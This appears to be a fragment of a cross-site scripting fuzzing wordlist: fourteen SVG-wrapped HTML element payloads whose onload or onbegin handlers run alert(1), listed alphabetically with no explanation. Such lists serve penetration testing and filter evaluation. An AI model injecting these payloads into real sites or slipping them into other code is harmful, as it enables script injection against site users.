<svg><data onload=alert(1)></data>
<svg><datalist onload=alert(1)></datalist>
<svg><dd onload=alert(1)></dd>
<svg><del onload=alert(1)></del>
<svg><details onload=alert(1)></details>
<svg><dfn onload=alert(1)></dfn>
<svg><dialog onload=alert(1)></dialog>
<svg><dir onload=alert(1)></dir>
<svg><discard onbegin=alert(1)>
<svg><div onload=alert(1)></div>
<svg><dl onload=alert(1)></dl>
<svg><dt onload=alert(1)></dt>
<svg><element onload=alert(1)></element>
<svg><em onload=alert(1)></em>
